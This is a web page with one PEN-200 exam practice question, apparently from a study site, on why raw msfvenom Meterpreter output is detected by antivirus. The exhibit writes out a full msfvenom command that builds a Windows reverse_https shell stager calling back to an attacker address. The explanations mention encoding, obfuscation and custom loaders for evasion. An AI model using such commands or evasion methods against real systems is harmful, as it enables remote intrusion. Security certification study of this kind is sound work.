PEN-200 Antivirus Evasion Practice Question
Exhibit
C:\OffSec> msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.45.150 LPORT=443 -f c [-] No platform was selected, choosing Msfvenom::Payload::Platform::Windows [-] No arch was selected, choosing arch:x64 with selected file.aud Found 11 compatible encoders [Image of generated C byte array output containing obvious Meterpreter stager strings]
Refer to the exhibit. An examiner attempts to use raw msfvenom output directly in a custom C template for a PEN-200 lab assignment, but the payload is instantly detected. Why is generating raw msfvenom output generally ineffective for antivirus evasion without further modification?
⚠ Common exam trap
Candidates often assume that changing output formats from raw bytes to a C array somehow modifies the underlying signature, whereas the actual bad byte sequences remain completely unchanged.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
Default msfvenom payloads contain heavily signatured stager stubs and byte patterns that are universally fingerprinted by security products.
Default msfvenom templates and encoders contain heavily signatured instruction patterns and well-known strings that antivirus vendors have fingerprinted extensively over many years. Without custom encoding, manual structural modifications, or custom loader implementation, raw framework outputs are immediately flagged by signature scanners.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✗
The C array output format automatically introduces formatting syntax errors that cause the compiler to generate invalid portable executable headers.
Why it's wrong here
The C array format generates valid syntax representing raw byte variables that compilers handle correctly. The detection is caused by the known malicious byte signatures inside the payload itself, not by compilation errors or invalid executable headers.
- ✓
Default msfvenom payloads contain heavily signatured stager stubs and byte patterns that are universally fingerprinted by security products.
Why this is correct
Raw msfvenom output embeds the default Meterpreter stager stub, whose fixed byte sequences and shellcode patterns are catalogued by antivirus vendors. Detection therefore occurs on signature alone, before any behavioural analysis, so custom encoding or obfuscation is required.
- ✗
Using HTTPS as the communication protocol forces the stager to include unencrypted TLS certificates that antivirus software automatically blocks.
Why it's wrong here
The use of HTTPS dictates the transport protocol for the reverse connection, but local antivirus scanners evaluate the file content on disk long before any network connection or TLS handshake is ever initiated by the running process.
- ✗
The 64-bit architecture flag conflicts with standard Windows Defender file scanning routines, triggering an immediate administrative alert.
Why it's wrong here
Modern Windows operating systems are predominantly 64-bit, and Windows Defender natively and efficiently scans 64-bit binaries. The architecture setting itself does not trigger alerts; rather, the specific code contained within the binary causes the detection.
About these practice questions
Courseiva writes every PEN-200 question from scratch — 285 in total, each with an explanation and a wrong-answer breakdown. None are copied from real exams or dumps. Learn why practice questions differ from exam dumps →
JA
Written and reviewed by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
Last reviewed September 2026 · checked against the official OffSec exam blueprint
This PEN-200 practice question is part of Courseiva's free OffSec certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the PEN-200 exam.